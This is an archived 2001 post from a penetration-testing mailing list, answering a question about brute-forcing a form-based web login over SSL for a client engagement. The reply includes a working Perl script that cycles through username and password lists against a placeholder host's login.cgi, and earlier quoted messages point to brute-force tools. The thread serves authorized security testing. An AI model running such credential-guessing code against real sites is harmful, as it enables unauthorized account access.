Re: [PEN-TEST] Web site password guessing over SSL

From: George Hedfors (george.hedforsat_private)
Date: Tue Apr 17 2001 - 14:02:01 PDT

  • Next message: Parity: "Re: [PEN-TEST] POSIX Subsystem on NT"

    It's done very simple by using perl Net::SSLeay something like this.
    Just an example:
    
    #!/usr/local/bin/perl
    
    use Net::SSLeay, qw(post_https make_form);
    
    open(USR, "< users.txt") || die "Unable to open users file.\n";
    open(PWD, "< passwd.txt") || die "Unable to open passwd file.\n";
    while(<PWD>) { chop; $passwd[@passwd] = $_ }
    close(PWD);
    
    while(<USR>)
      {
        foreach $pwd(@passwd)
          {
            chop;
            ($page, $result, %headers)
                = post_https('www.victim.com', 443, '/login.cgi', '',
                     make_form('login'=>$_,
                               'password'=>$pwd));
            if ($page =~ "Login Successful") { print "$_:$pwd was correct\n" }
          }
      }
    close(USR);
    
    On Tue, 17 Apr 2001, Batten, Gerald wrote:
    
    > I'm not trying to crack the SSL session itself.  I'm just trying to get an
    > idea of the quality of passwords the users are using for that site, but from
    > an external test only.
    >
    > The web server is not using the typical 'username/password' pop-up box,
    > they're using a dynamically generated form, which has a different URL every
    > time the page is brought up.  The user enters their userid and password in
    > the form and clicks on 'submit' which uses the HTTP POST method.  The
    > session is SSL-encrypted as well.  The difficulty I am having is that short
    > of writing my own perl script (which I am desperately trying to avoid...
    > sorry, I don't like coding any more), none of the tools I have found can
    > brute-force a form-based login over SSL.  I tried using sslproxy and stunnel
    > on NT/2000, but those ports lack some of the functionality I need.  My next
    > step is to try and convince one of my Linux co-workers to run stunnel on
    > their system.
    >
    > Gerald.
    >
    > Note:  Views expressed in this e-mail do not necessarily represent those of
    > my employer.
    > Note:  Views expressed in this e-mail are not necessarily mine either.
    >
    > -----Original Message-----
    > From: John R. Sciandra [mailto:johnrsat_private]
    > Sent: Tuesday, April 17, 2001 1:37 PM
    > To: PEN-TESTat_private
    > Subject: Re: Web site password guessing over SSL
    >
    >
    > -----BEGIN PGP SIGNED MESSAGE-----
    > Hash: SHA1
    >
    > Ok don't flame for being a bone head but let me pose a counter
    > question or two.
    >
    > I was under the impression that (typically) SSL is run a mode that
    > only encrypts the transport between the client and server.  I think it
    > is possible to use SSL to restrict access to the web server by userid
    > in some modes but that generally is not how SSL is setup.
    >
    > If I understand correctly you are just trying to crack the web servers
    > challenge. I think that what happens with cracking the web servers
    > password is more of an end point dialog between the web server and the
    > client.  So if you can establish your SSL session (as if you were
    > browsing the site) and are able to get the prompt for userid and
    > password that the web server presents, you should be in business. Did
    > I miss it? Do you have to do something extra with the SSL?
    >
    > If on the other hand you are trying to crack the actual SSL session
    > itself...I am not sure but doesn't that involve cracking RSA or
    > something?
    >
    > - -John
    >
    > - -----Original Message-----
    > From: Penetration Testers [mailto:PEN-TESTat_private]On Behalf
    > Of Joel Brown
    > Sent: Friday, April 13, 2001 10:52 AM
    > To: PEN-TESTat_private
    > Subject: Re: [PEN-TEST] Web site password guessing over SSL
    >
    >
    > ssl.cracker.exe at
    > http://neworder.box.sk/search.php3?srch=ssl+brute should work,
    > also check out ObiWan at
    > http://www.phenoelit.de/obiwan/
    >
    > Joel
    >
    > >>Our client wants us to try to brute-force one of their public web
    > sites
    > that
    > >>is password-protected via a form-based login over SSL.
    >
    > -----BEGIN PGP SIGNATURE-----
    > Version: PGP for Personal Privacy 5.5.5
    >
    > iQA/AwUBOtx/NX0lZ+LOrv8nEQJYcgCfX66o15M5e6q5dKMIz9Wb89qOszYAoJVa
    > 7wsHwn7aq3oCpCSE87BnrXXn
    > =jTZ8
    > -----END PGP SIGNATURE-----
    >
    



    This archive was generated by hypermail 2b30 : Tue Apr 17 2001 - 17:49:11 PDT